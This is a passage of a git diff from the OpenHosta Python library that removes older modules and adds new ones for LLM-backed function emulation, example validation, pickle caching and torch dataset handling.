- return l_ret
diff --git a/src/OpenHosta/encoder.py b/src/OpenHosta/encoder.py
deleted file mode 100644
index a975ad0..0000000
--- a/src/OpenHosta/encoder.py
+++ /dev/null
@@ -1,36 +0,0 @@
-from typing import Any
-
-class HostaEncoder():
- def __init__(self) -> None:
- None
-
- def encode(self, value: Any):
- if type(value) == int:
- return IntEncoder.encoder(value)
- elif type(value) == float:
- return FloatEncoder.encoder(value)
- elif type(value) == str:
- try:
- convert_type = FloatEncoder.encoder(value)
- return convert_type
- except:
- raise ValueError("String cannot be converted to float (numbers in string only supported for now)")
- else:
- raise ValueError("Type not supported")
-
-
-class IntEncoder(HostaEncoder):
- def __init__(self) -> None:
- super().__init__()
-
- def encoder(data):
- data_encode = int(data)
- return [data_encode]
-
-class FloatEncoder(HostaEncoder):
- def __init__(self) -> None:
- super().__init__()
-
- def encoder(data):
- data_encode = float(data)
- return [data_encode]
diff --git a/src/OpenHosta/enhancer.py b/src/OpenHosta/enhancer.py
deleted file mode 100644
index 08a3cb8..0000000
--- a/src/OpenHosta/enhancer.py
+++ /dev/null
@@ -1,100 +0,0 @@
-import json
-import sys
-from typing import Callable
-
-from .prompt import PromptMananger
-from .config import DefaultManager
-
-
-_x = PromptMananger()
-_enhancer_pre_prompt = _x.get_prompt("enhance")
-
-l_default = DefaultManager.get_default_model()
-
-
-def _ai_call_enh(sys_prompt: str, func_prot: str, func_doc: str):
- global l_default
-
- l_user_prompt = (
- "\nHere's my python function's prototype:\n---\n"
- + func_prot
- + "\n---\n"
- + "\nHere's my python function's prompt:\n---\n"
- + func_doc
- + "\n---\n"
- )
-
- response = l_default.api_call(
- sys_prompt=sys_prompt, user_prompt=l_user_prompt, creativity=0.8, diversity=0.8
- )
-
- response_data = response.json()
- return response_data["choices"][0]["message"]["content"]
-
-
-def _parse_data(response: str, last_enh: dict) -> dict:
- try:
- l_ret_data = json.loads(response)
-
- except json.JSONDecodeError as e:
- sys.stderr.write(f"JSONDecodeError: {e}")
- l_cleand = "\n".join(response.split("\n")[1:-1])
- l_ret_data = json.loads(l_cleand)
-
- last_enh["enhanced"] = l_ret_data["enhanced"]
- last_enh["review"] = l_ret_data["review"]
- last_enh["advanced"] = l_ret_data["advanced"]
- last_enh["mermaid"] = l_ret_data["mermaid"]
- return last_enh
-
-
-def _build_attributes(func: object, last_enh) -> int:
- try:
- if not func.__name__ or not type(func.__name__) is str:
- raise ValueError("ValueError -> function name")
- if not last_enh["enhanced"] or not type(last_enh["enhanced"]) is str:
- raise ValueError("ValueError -> enhanced output")
- if not last_enh["review"] or not type(last_enh["review"]) is str:
- raise ValueError("ValueError -> review output")
- if not last_enh["advanced"] or not type(last_enh["advanced"]) is str:
- raise ValueError("ValueError -> seggested output")
- if not last_enh["mermaid"] or not type(last_enh["mermaid"]) is str:
- raise ValueError("ValueError -> mermaid output")
- except ValueError as e:
- sys.stderr.write(f"[BUILD_ERROR] {e}")
- return -1
- finally:
- func.enhanced_prompt = last_enh["enhanced"]
- func.review = last_enh["review"]
- func.advanced = last_enh["advanced"]
- func.diagram = last_enh["mermaid"]
- return 0
-
-
-def enhance(func):
- global _enhancer_pre_prompt
-
- last_enh: dict = {
- "enhanced": None,
- "review": None,
- "advanced": None,
- "mermaid": None,
- }
-
- func_name, func_doc = func.__name__, func.__doc__
-
- last_return = _ai_call_enh(_enhancer_pre_prompt, func._prot, func_doc)
-
- last_enh = _parse_data(last_return, last_enh)
-
- _build_attributes(func, last_enh)
- return last_enh
-
-def suggest(func:Callable):
- if not callable(func):
- raise ValueError("Suggest arguments must be a callable.")
- try:
- full = func.__suggest__(func)
- except AttributeError:
- raise AttributeError(f"The “__suggest__” attribute is not defined. The function {func.__name__} might not have been called.")
- return full
diff --git a/src/OpenHosta/example.py b/src/OpenHosta/example.py
deleted file mode 100644
index 4a75954..0000000
--- a/src/OpenHosta/example.py
+++ /dev/null
@@ -1,256 +0,0 @@
-import inspect
-import pickle
-import os
-import json
-import csv
-from typing import Callable
-
-from .errors import FrameError
-from .cache import Hostacache
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-
-def example(*args, hosta_func=None, hosta_out=None, **kwargs):
- input_type = {}
- output_type = {}
- example_dict = {}
-
- if hosta_func is None:
- try:
- func, _ = _extend_scope()
- except:
- raise ValueError("Please provide hosta_func for specifying the function")
- elif callable(hosta_func):
- func = hosta_func
- else:
- raise ValueError("Please provide hosta_func for specifying the function")
-
- try:
- sig = inspect.signature(func)
- for param in sig.parameters.values():
- input_type[param.name] = param.annotation
- output_type["hosta_out"] = sig.return_annotation
- except:
- raise ValueError("Function does not have a signature")
-
- type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict)
-
- cache_id = "ho_example"
- cache = Hostacache(func, cache_id, example_dict)
- cache.create_hosta_cache()
-
-
-def type_verificator(args, kwargs, input_type, output_type, hosta_out, func, example_dict):
- """
- Validates the types of both positional and keyword arguments, as well as the return value.
- """
-
- if args:
- if len(args) != len(input_type):
- raise ValueError(
- f"Too many arguments for function {func.__name__}, "
- f"expected {len(input_type)} arguments, use hosta_out for output."
- )
-
- for i, arg in enumerate(args):
- param_name = list(input_type.keys())[i]
- expected_type = input_type[param_name]
-
- if not isinstance(arg, expected_type):
- raise TypeError(
- f"Argument {arg} does NOT match the expected type "
- f"{expected_type} for parameter {param_name} in function {func.__name__}."
- )
- example_dict[param_name] = arg
-
- else:
- if len(kwargs) != len(input_type):
- raise ValueError(
- f"Mismatch in number of keyword arguments for function '{func.__name__}', "
- f"expected {len(input_type)} arguments, use hosta_out for output."
- )
-
- for key, value in kwargs.items():
- expected_type = input_type[key]
-
- if not isinstance(value, expected_type):
- raise TypeError(
- f"Keyword argument {value} does NOT match the expected type "
- f"{expected_type} for parameter {key} in function {func.__name__}."
- )
- example_dict[key] = value
-
- if hosta_out is None:
- raise ValueError("Please provide hosta_out for output.")
- else:
- expected_output_type = output_type["hosta_out"]
- if not isinstance(hosta_out, expected_output_type):
- raise TypeError(
- f"Output {hosta_out} does NOT match the expected type "
- f"{expected_output_type} for function {func.__name__}."
- )
- example_dict["hosta_out"] = hosta_out
-
-
-def save_examples(hosta_func=None, hosta_path=None):
- cached_data = {}
-
- if hosta_func is None:
- try:
- func, _ = _extend_scope()
- except:
- raise ValueError(f"Please provide hosta_func for specifying the function")
-
- elif callable(hosta_func):
- func = hosta_func
- else:
- raise ValueError(f"Please provide hosta_func for specifying the function")
-
- if hosta_path is None:
- raise ValueError(
- f"Please provide hosta_path for specifying the path to save the cache"
- )
- total_path = f"{hosta_path}" + ".jsonl"
-
- func_name = func.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
-
- try:
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- with open(total_path, "a") as t:
- for dict in cached_data["ho_example"]:
- t.write(json.dumps(dict) + "\n")
- t.write(json.dumps(dict) + "\n")
- else:
- raise ValueError(f"Could not found the cache at {path_name}")
- except Exception as e:
- raise ValueError(f"Could not found the cache at {path_name}") from e
-
-
-def load_training_example(hosta_path: str, hosta_func: callable) -> dict:
- """
- Load the training example from the cache.
- """
- func_name = hosta_func.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- cached_data = None
-
- if os.path.exists(path_name):
- try:
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- except (pickle.PickleError, IOError) as e:
- raise ValueError(f"Error loading cache from {path_name}") from e
- else:
- cache = Hostacache(hosta_func, None)
- cache.create_hosta_cache()
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
-
- _, file_extension = os.path.splitext(hosta_path)
- if file_extension not in ['.json', '.jsonl', '.csv']:
- raise ValueError("Unsupported file type. Please provide a JSON or JSONL or CSV file.")
-
- try:
- with open(hosta_path, 'r') as file:
- if file_extension == '.json':
- data = json.load(file)
- if isinstance(data, list):
- for item in data:
- if item not in cached_data['ho_data']:
- cached_data['ho_data'].append(item)
- else:
- if data not in cached_data['ho_data']:
- cached_data['ho_data'].append(data)
- elif file_extension == '.jsonl':
- for line in file:
- item = json.loads(line)
- if item not in cached_data['ho_data']:
- cached_data['ho_data'].append(item)
- elif file_extension == '.csv':
- reader = csv.DictReader(file)
- for row in reader:
- if row not in cached_data['ho_data']:
- cached_data['ho_data'].append(row)
- with open(path_name, "wb") as f:
- pickle.dump(cached_data, f)
- except (IOError, json.JSONDecodeError) as e:
- raise ValueError(f"Error loading data from {hosta_path}") from e
- return cached_data
-
-
-def _extend_scope() -> Callable:
- func: Callable = None
- current = None
- step = None
- caller = None
-
- current = inspect.currentframe()
- if current is None:
- raise FrameError("Current frame is None")
- step = current.f_back
- if step is None:
- raise FrameError("Caller[lvl1] frame is None")
- caller = step.f_back
- if caller is None:
- raise FrameError("Caller[lvl2] frame is None")
-
- caller_name = caller.f_code.co_name
- caller_code = caller.f_code
- l_caller = caller
-
- if "self" in caller.f_locals:
- obj = caller.f_locals["self"]
- func = getattr(obj, caller_name, None)
- if func:
- func = inspect.unwrap(func)
- else:
- while func is None and l_caller.f_back is not None:
- for obj in l_caller.f_back.f_locals.values():
- found = False
- try:
- if hasattr(obj, "__code__"):
- found = True
- except:
- continue
- if found and obj.__code__ == caller_code:
- func = obj
- break
- if func is None:
- l_caller = l_caller.f_back
- if func is None:
- func = caller.f_globals.get(caller_name)
- if func:
- func = inspect.unwrap(func)
-
- if func is None or not callable(func):
- raise FrameError("The emulated function cannot be found.")
-
- return func, caller
-
-
-EXAMPLE_DOC = """
-A utility function that performs runtime type validation on a given function's arguments and output.
-
-Parameters:
- *args:
- Positional arguments to validate against the input types of the provided function (hosta_func).
- **kwargs:
- Keyword arguments (passed by name) to validate against the input types of the provided function.
- hosta_func (function, optional but recommended):
- The function whose signature will be used for input/output type validation.
- hosta_out (object):
- The expected output of hosta_func, to be validated against the return type annotation.
-
-Raises:
- ValueError:
- If the number of arguments provided does not match the expected number as per the function's signature.
- TypeError:
- If the type of any argument or output does not match the expected type.
-"""
\ No newline at end of file
diff --git a/src/OpenHosta/exec.py b/src/OpenHosta/exec.py
deleted file mode 100644
index bbb4bf3..0000000
--- a/src/OpenHosta/exec.py
+++ /dev/null
@@ -1,272 +0,0 @@
-import pickle
-import os
-import hashlib
-import inspect
-from typing import Callable, Dict, Any, get_origin, get_args
-import typing
-import collections
-from pydantic import BaseModel, create_model
-import copy
-
-import functools
-
-from .enhancer import enhance
-from .errors import FrameError
-from .predict import continue_train, to_emulate, retrain
-
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-class HostaInjector:
- def __init__(self, exec):
- if not callable(exec):
- raise TypeError("Executive function must be a function.")
-
- self.exec = exec
- self.infos_cache = {}
-
- def __call__(self, *args, **kwargs):
- self.infos_cache = {
- "hash_function": "",
- "function_def": "",
- "return_type": "",
- "return_caller": "",
- "function_call": "",
- "function_args": {},
- "function_locals": {},
- "ho_example": [],
- "ho_example_id": 0,
- "ho_example_links": [],
- "ho_cothougt": [],
- "ho_cothougt_id": 0,
- "ho_data": [],
- "ho_data_id" : 0
- }
- func_obj, caller = self._extend_scope()
- func_name = func_obj.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
-
- function_def, func_prot = self._get_functionDef(func_obj)
- function_hash = self._get_hashFunction(
- function_def,
- cached_data["ho_example_id"],
- cached_data["ho_cothougt_id"],
- )
-
- self._attach_attributs(func_obj, func_prot)
- if function_hash == cached_data["hash_function"]:
- cached_data["function_call"], cached_data["function_locals"], cached_data["function_args"] = (
- self._get_functionCall(func_obj, caller)
- )
- return self.exec(cached_data, func_obj, *args, **kwargs)
-
- hosta_args = self._get_argsFunction(func_obj)
- with open(path_name, "wb") as f:
- res = pickle.dump(hosta_args, f)
- # TODO : fix the function locals because he didn't load in the cache
- hosta_args["function_call"], hosta_args["function_locals"], hosta_args["function_args"] = (
- self._get_functionCall(func_obj, caller)
- )
- self._attach_attributs(func_obj, hosta_args["function_def"])
- return self.exec(hosta_args, func_obj, *args, **kwargs)
-
- def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
- combined = f"{func_def}{nb_example}{nb_thought}"
- return hashlib.md5(combined.encode()).hexdigest()
-
- def _get_argsFunction(self, func_obj):
-
- self.infos_cache["function_def"], func_prot = self._get_functionDef(func_obj)
- self.infos_cache["return_type"], self.infos_cache["return_caller"] = (
- self._get_functionReturnType(func_obj)
- )
- self.infos_cache["hash_function"] = self._get_hashFunction(
- self.infos_cache["function_def"],
- self.infos_cache["ho_example_id"],
- self.infos_cache["ho_cothougt_id"],
- )
- return self.infos_cache
-
- def _extend_scope(self) -> Callable:
- func: Callable = None
- current = None
- step = None
- caller = None
-
- current = inspect.currentframe()
- if current is None:
- raise FrameError("Current frame is None")
- step = current.f_back
- if step is None:
- raise FrameError("Caller[lvl1] frame is None")
- caller = step.f_back
- if caller is None:
- raise FrameError("Caller[lvl2] frame is None")
-
- caller_name = caller.f_code.co_name
- caller_code = caller.f_code
- l_caller = caller
-
- if "self" in caller.f_locals:
- obj = caller.f_locals["self"]
- func = getattr(obj, caller_name, None)
- if func:
- func = inspect.unwrap(func)
- else:
- while func is None and l_caller.f_back is not None:
- for obj in l_caller.f_back.f_locals.values():
- found = False
- try:
- if hasattr(obj, "__code__"):
- found = True
- except:
- continue
- if found and obj.__code__ == caller_code:
- func = obj
- break
- if func is None:
- l_caller = l_caller.f_back
- if func is None:
- func = caller.f_globals.get(caller_name)
- if func:
- func = inspect.unwrap(func)
-
- if func is None or not callable(func):
- raise FrameError("The emulated function cannot be found.")
-
- return func, caller
-
- def _get_functionDef(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- func_name = func.__name__
- func_params = ", ".join(
- [
- (
- f"{param_name}: {param.annotation.__name__}"
- if param.annotation != inspect.Parameter.empty
- else param_name
- )
- for param_name, param in sig.parameters.items()
- ]
- )
- func_return = (
- f" -> {sig.return_annotation.__name__}"
- if sig.return_annotation != inspect.Signature.empty
- else ""
- )
- definition = (
- f"```python\ndef {func_name}({func_params}):{func_return}\n"
- f" \"\"\"\n\t{func.__doc__}\n \"\"\"\n```"
- )
- prototype = f"def {func_name}({func_params}):{func_return}"
- return definition, prototype
-
- def _get_functionCall(self, func: Callable, caller) -> str:
- locals = None
- _, _, _, values = inspect.getargvalues(caller)
-
- sig = inspect.signature(func)
-
- values_args = copy.deepcopy(values)
- values_locals = copy.deepcopy(values)
- for values_name in values.keys():
- if values_name not in sig.parameters.keys():
- values_args.pop(values_name)
- else:
- values_locals.pop(values_name)
-
- if "self" in values_locals.keys():
- values_locals.pop("self")
-
- if values_locals != {}:
- locals = copy.deepcopy(values_locals)
-
- bound_args = sig.bind_partial(**values_args)
- bound_args.apply_defaults()
-
- args_str = ", ".join(
- f"{name}={value!r}" if name in bound_args.kwargs else f"{value!r}"
- for name, value in bound_args.arguments.items()
- )
-
- call = f"{func.__name__}({args_str})"
- return call, locals, values_args
-
- def _inspect_returnType(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- if sig.return_annotation != inspect.Signature.empty:
- return sig.return_annotation
- else:
- return None
-
- def _get_typingOrigin(self, return_type) -> bool:
- origin = get_origin(return_type)
- return origin in {
- list,
- dict,
- tuple,
- set,
- frozenset,
- typing.Union,
- typing.Annotated,
- typing.Optional,
- typing.Literal,
- collections.deque,
- collections.abc.Iterable,
- collections.abc.Sequence,
- collections.abc.Mapping,
- }
-
- def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
- return_caller = self._inspect_returnType(func)
- return_type = None
-
- if return_caller is not None:
- if self._get_typingOrigin(return_caller):
- return_caller_origin = get_origin(return_caller)
- return_caller_args = get_args(return_caller)
- combined = return_caller_origin[return_caller_args]
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type_typing=(combined, ...)
- )
- return_type = new_model.model_json_schema()
- elif issubclass(return_caller, BaseModel):
- return_type = return_caller.model_json_schema()
- else:
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type=(return_caller, ...)
- )
- return_type = new_model.model_json_schema()
- else:
- No_return_specified = create_model(
- "Hosta_return_shema", return_hosta_type_any=(Any, ...)
- )
- return_type = No_return_specified.model_json_schema()
-
- return return_type, return_caller
-
- def _attach_attributs(self, func: Callable, prototype: str)->None:
- """
- Attach additional attributes to a function.
-
- Args:
- func (Callable): The target function to which the attributes are attached.
- prototype (str): A string representing the prototype (used as an example).
-
- Returns:
- Callable: The target function wrapped with the attached attributes.
- """
- if "bound method" not in str(func):
- setattr(func, "__suggest__", enhance)
- setattr(func, "_prot", prototype)
- setattr(func, "continue_train", functools.partial(continue_train, func_obj=func))
- setattr(func, "retrain", functools.partial(retrain, func_obj=func))
- setattr(func, "emulate", functools.partial(to_emulate, func_obj=func))
-
diff --git a/src/OpenHosta/exec/__init__.py b/src/OpenHosta/exec/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/ask.py b/src/OpenHosta/exec/ask.py
new file mode 100644
index 0000000..16c0c3b
--- /dev/null
+++ b/src/OpenHosta/exec/ask.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+
+from typing import Any, Optional
+
+from ..core.config import Model, DefaultManager
+from ..utils.errors import RequestError
+
+
+def ask(
+ *,
+ user: str,
+ system: Optional[str] = None,
+ model: Optional[Model] = None,
+ **api_args
+) -> Any:
+ if model is None:
+ model = DefaultManager.get_default_model()
+ if system is None:
+ system = "You are an helpful assistant."
+
+ response = model.simple_api_call(
+ system,
+ user,
+ False,
+ **api_args
+ )
+
+ try:
+ data = response.json()
+ res = data["choices"][0]["message"]["content"]
+ setattr(ask, "_last_tokens", data["usage"]["total_tokens"])
+ return res
+ except Exception as e:
+ raise RequestError(f"[ask] Request failed:\n{e}")
diff --git a/src/OpenHosta/exec/emulate.py b/src/OpenHosta/exec/emulate.py
new file mode 100644
index 0000000..c75bae7
--- /dev/null
+++ b/src/OpenHosta/exec/emulate.py
@@ -0,0 +1,89 @@
+from __future__ import annotations
+
+from typing import Any, Optional, Callable
+
+from ..core.config import Model, DefaultManager
+from ..core.hosta import Hosta, Func
+from ..utils.meta_prompt import EMULATE_PROMPT
+
+
+def _build_user_prompt(
+ _infos: Func = None,
+ x: Hosta = None,
+ use_locals_as_ctx: Optional[bool] = False,
+ use_self_as_ctx: Optional[bool] = False,
+):
+ def filler(
+ pre, value): return f"**{pre}**\n{str(value)}\n\n" if value is not None and value != [] else ""
+
+ user_prompt = (
+ filler(EMULATE_PROMPT.PRE_DEF, _infos.f_def)
+ + filler(EMULATE_PROMPT.PRE_TYPE, _infos.f_type[1])
+ + filler(EMULATE_PROMPT.PRE_SCHEMA, _infos.f_schema)
+ )
+ if use_locals_as_ctx:
+ user_prompt = (
+ user_prompt + filler(EMULATE_PROMPT.PRE_LOCALS, _infos.f_locals))
+ if use_self_as_ctx:
+ user_prompt = (
+ user_prompt + filler(EMULATE_PROMPT.PRE_SELF, _infos.f_self))
+ if x:
+ user_prompt = (
+ user_prompt
+ + filler(EMULATE_PROMPT.PRE_EXAMPLE, x.example)
+ + filler(EMULATE_PROMPT.PRE_COT, x.cot)
+ )
+ user_prompt = (user_prompt + EMULATE_PROMPT.USER_SEP)
+ return user_prompt
+
+
+def emulate(
+ _infos: Optional[Func] = None,
+ *,
+ model: Optional[Model] = None,
+ use_locals_as_ctx: bool = False,
+ use_self_as_ctx: bool = False,
+ post_callback: Optional[Callable] = None,
+ **llm_args
+) -> Any:
+ x = None
+ l_ret: Any = None
+
+ if _infos is None:
+ x = Hosta()
+ _infos = getattr(x._update_call(), "_infos")
+ func_prompt: str = _build_user_prompt(
+ _infos, x, use_locals_as_ctx, use_self_as_ctx)
+
+ if model is None:
+ model = DefaultManager.get_default_model()
+
+ if x:
+ x._attach(_infos.f_obj, {
+ "_last_request": None,
+ "_last_response": None
+ })
+
+ try:
+ if x:
+ _infos.f_obj._last_request = {
+ 'sys_prompt':f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
+ 'user_prompt':_infos.f_call} | llm_args
+
+ response = model.simple_api_call(
+ sys_prompt=f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
+ user_prompt=_infos.f_call,
+ **llm_args
+ )
+
+ if x:
+ _infos.f_obj._last_response=response
+
+ l_ret = model.request_handler(response, _infos)
+ if post_callback is not None:
+ l_ret = post_callback(l_ret)
+ except NameError as e:
+ raise NotImplementedError(
+ f"[emulate]: {e}\nModel object does not have the required methods.")
+
+ return l_ret
diff --git a/src/OpenHosta/exec/example.py b/src/OpenHosta/exec/example.py
new file mode 100644
index 0000000..10b97a1
--- /dev/null
+++ b/src/OpenHosta/exec/example.py
@@ -0,0 +1,31 @@
+from __future__ import annotations
+
+from typing import Any, get_args
+
+from ..core.hosta import Hosta, ExampleType
+
+
+def example(*args, hosta_out: Any = None, **kwargs):
+ x = Hosta()
+ if args != ():
+ raise ValueError(
+ "[example] The arguments in example function must keyword only arguments, with keywords matching with the name of the calling function's arguments")
+ if type(hosta_out) != x._infos.f_type[1] \
+ and hosta_out not in get_args(x._infos.f_type[1]) \
+ and type(hosta_out) not in get_args(x._infos.f_type[1]):
+ raise ValueError("[example] hosta_out's type doesn't match with the calling function's return type:\n\t{} instead of {}.".format(
+ type(hosta_out),
+ x._infos.f_type[1]
+ ))
+ if len(kwargs) != len(x._infos.f_type[0]):
+ print(x._infos.f_type[1])
+ raise ValueError("[example] Invalid number of argument. Expected {}, got {}".format(
+ len(x._infos.f_type[0]), len(kwargs)))
+ for (k1, v1), (k2, v2) in zip(kwargs.items(), x._infos.f_args.items()):
+ if k1 != k2:
+ raise ValueError(
+ "[example] Invalid arguments name: Expected {}, got {}".format(k2, k1))
+ if type(v1) != type(v2):
+ raise ValueError("[example] Invalid arguments type: Expected {}, got {}".format(
+ type(v2), type(v1)))
+ x._bdy_add('ex', ExampleType(in_=kwargs, out=hosta_out))
diff --git a/src/OpenHosta/exec/predict/__init__.py b/src/OpenHosta/exec/predict/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/dataset/__init__.py b/src/OpenHosta/exec/predict/dataset/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/exec/predict/dataset/dataset.py b/src/OpenHosta/exec/predict/dataset/dataset.py
new file mode 100644
index 0000000..38b2519
--- /dev/null
+++ b/src/OpenHosta/exec/predict/dataset/dataset.py
@@ -0,0 +1,337 @@
+import csv
+import json
+import os
+from enum import Enum
+from typing import List, Optional, Any, Dict
+
+import torch
+
+from .sample_type import Sample
+from ..encoder.simple_encoder import SimpleEncoder
+
+
+class SourceType(Enum):
+ """
+ Enum for different types of sources for the dataset.
+ """
+ CSV = "csv"
+ JSONL = "jsonl"
+ JSON = "json"
+class HostaDataset:
+ def __init__(self, verbose: int = 1):
+ self.path: Optional[str] = None # Path to the file
+ self.data: List[Sample] = [] # List of Sample objects
+ self.dictionary: Dict[str, int] = {} # Dictionary for mapping str to id
+ self.inference: Optional[Sample] = None # Inference data for understanding the data
+ self.verbose: int = verbose # Verbose level for debugging
+ self._encoder: Optional[SimpleEncoder] = None # Will store the encoder instance
+
+ def add(self, sample: Sample):
+ """
+ Add a Sample object to the dataset.
+ """
+ self.data.append(sample)
+ def convert_data(self, batch_size: int, shuffle: bool, train_set_size: float = 0.8) -> tuple:
+ """
+ Save the dataset to a file in the specified format and convert it into dataloader for training.
+ """
+ if not isinstance(self.data[0].input, torch.Tensor):
+ self.tensorify()
+
+ inputs = torch.stack([sample.input for sample in self.data])
+ if all(sample.output is not None for sample in self.data):
+ outputs = torch.stack([sample.output for sample in self.data])
+ dataset = torch.utils.data.TensorDataset(inputs, outputs)
+ else:
+ dataset = torch.utils.data.TensorDataset(inputs)
+
+ return self._create_dataloaders(dataset, batch_size, shuffle, train_set_size)
+
+ def save_data(self, file_path: str):
+ """
+ Sauvegarde le dataset au format JSON
+ """
+ data_to_save = {
+ 'data': [
+ {
+ '_inputs': sample.input.tolist() if isinstance(sample.input, torch.Tensor) else sample.input,
+ '_outputs': sample.output.tolist() if isinstance(sample.output, torch.Tensor) else sample.output
+ }
+ for sample in self.data
+ ]
+ }
+ with open(file_path, 'w') as f:
+ json.dump(data_to_save, f)
+
+ def load_data(self, file_path: str):
+ """
+ Charge un dataset depuis un fichier JSON
+ """
+ with open(file_path, 'r') as f:
+ data_dict = json.load(f)
+
+ for sample_dict in data_dict['data']:
+ self.add(Sample(sample_dict))
+
+ def _create_dataloaders(self, dataset, batch_size: int, shuffle: bool, train_set_size: float):
+ """
+ Méthode utilitaire pour créer les dataloaders
+ """
+ train_size = int(train_set_size * len(dataset))
+
+ train_dataset = torch.utils.data.Subset(dataset, range(train_size))
+ val_dataset = torch.utils.data.Subset(dataset, range(train_size, len(dataset)))
+
+ return (
+ torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=shuffle),
+ torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False)
+ )
+
+
+ @staticmethod
+ def from_data(data_path: str, batch_size: int, shuffle: bool, train_set_size: float = 0.8, verbose: int = 1) -> tuple:
+ """
+ Load a dataset from a file and convert it into dataloader for training.
+ """
+ dataset = HostaDataset(verbose)
+ dataset.load_data(data_path)
+ return dataset.convert_data(batch_size, shuffle, train_set_size)
+
+
+ def save(self, path: str, source_type: SourceType = SourceType.CSV, elements: Optional[List[Sample]] = None):
+ """
+ Save the dataset or specific elements to a file in the specified format.
+ Converts Sample objects back to dictionaries for storage.
+
+ Args:
+ path: Path where to save the file
+ source_type: Type of file format to save (CSV, JSONL, or PICKLE)
+ elements: Optional list of Sample objects to save. If None, saves entire dataset
+ """
+ self.path = path
+ data_to_save = elements if elements is not None else self.data
+
+ # Convert Samples to dictionaries for saving
+ dict_data = []
+ for sample in data_to_save:
+ sample_dict = {}
+ for i, input_value in enumerate(sample.input):
+ sample_dict[f'input_{i}'] = input_value
+ if sample.output is not None:
+ sample_dict['_outputs'] = sample.output
+ dict_data.append(sample_dict)
+
+ if source_type == SourceType.CSV:
+ with open(path, 'w', newline='', encoding='utf-8') as f:
+ if not dict_data:
+ return
+ writer = csv.DictWriter(f, fieldnames=dict_data[0].keys())
+ writer.writeheader()
+ writer.writerows(dict_data)
+
+ elif source_type == SourceType.JSONL:
+ with open(path, 'w', encoding='utf-8') as f:
+ for row in dict_data:
+ json.dump(row, f)
+ f.write('\n')
+
+ else:
+ raise ValueError(f"Unsupported source type: {source_type}")
+
+ def convert_files(self, path: str, source_type: Optional[SourceType] = None) -> List[Sample]:
+ """
+ Load dataset from a file and convert each row to a Sample object.
+
+ Args:
+ path: Path to the source file
+ source_type: Type of file to load (CSV, JSONL, or PICKLE)
+
+ Returns:
+ self.data will be updated with the loaded data
+ """
+ if not os.path.exists(path):
+ raise FileNotFoundError(f"File not found: {path}")
+ self.path = path # Save the pass for acces easily later
+
+ if source_type is None:
+ if path.endswith('.csv'):
+ source_type = SourceType.CSV
+ elif path.endswith('.jsonl'):
+ source_type = SourceType.JSONL
+ else:
+ raise ValueError(f"Please specify the source type for the file: {path}")
+
+ if source_type == SourceType.CSV:
+ with open(path, 'r') as f:
+ reader = csv.DictReader(f)
+ for row in reader:
+ # Convert string numbers to float if possible
+ processed_row = {}
+ for key, value in row.items():
+ try:
+ processed_row[key] = float(value)
+ except ValueError:
+ processed_row[key] = value
+ self.data.append(Sample(processed_row))
+
+ elif source_type == SourceType.JSONL:
+ with open(path, 'r') as f:
+ for line in f:
+ record = json.loads(line)
+ if not isinstance(record, dict):
+ record = {'input_0': record}
+ self.data.append(Sample(record))
+
+ else:
+ raise ValueError(f"Unsupported source type: {source_type}")
+ return self.data
+
+ def convert_list(self, data: list) -> List[Sample]:
+ """
+ Create a dataset from a list.
+
+ Args:
+ data: List of dictionaries or tuples/lists representing Sample _inputs and _outputs.
+ Each item should either be:
+ - a dict with keys for _inputs (e.g., 'input_0', 'input_1', ...) and optional '_outputs', or
+ - a tuple/list where the first part is _inputs(s) and the last item is _outputs (optional).
+
+ Returns:
+ HostaDataset instance
+ """
+
+ for entry in data:
+ if isinstance(entry, dict):
+ # If the entry is already a dictionary, let's assume it has the keys in the right structure
+ self.add(Sample(entry))
+ elif isinstance(entry, (list, tuple)):
+ # If it's a list or tuple, we assume it's structured as (_inputs..., [_outputs])
+ inputs = list(entry[:-1]) # All but last element are _inputs
+ output = entry[-1] if len(entry) > 1 else None # Last element could be _outputs if present
+ sample_dict = {f'input_{i}': input_value for i, input_value in enumerate(inputs)}
+ if output is not None:
+ sample_dict['_outputs'] = output
+ self.add(Sample(sample_dict))
+ else:
+ raise ValueError(f"Unsupported data format in list entry: {entry}")
+
+ def encode(self, max_tokens: int) -> None:
+ """
+ Encode le dataset d'entraînement et crée le dictionnaire
+ """
+ if self._encoder is None:
+ self._encoder = SimpleEncoder()
+ self.data = self._encoder.encode(self.data, max_tokens=max_tokens)
+ self.dictionary = self._encoder.dictionary
+
+ def encode_inference(self) -> None:
+ """
+ Encode les données d'inférence avec le dictionnaire existant
+ """
+ if self.dictionary is None:
+ raise ValueError("No dictionary available. Call encode() first on training data")
+
+ self._encoder = SimpleEncoder(existing_dict=self.dictionary)
+ self.inference = self._encoder.encode([self.inference], max_tokens=10)[0]
+
+ def tensorify(self, dtype=None) -> None:
+ """
+ Convertit le dataset d'entraînement en tenseurs
+ """
+ if dtype is None:
+ dtype = torch.float32
+
+ for sample in self.data:
+ if not isinstance(sample.input, torch.Tensor):
+ sample._inputs = torch.tensor(sample.input, dtype=dtype)
+
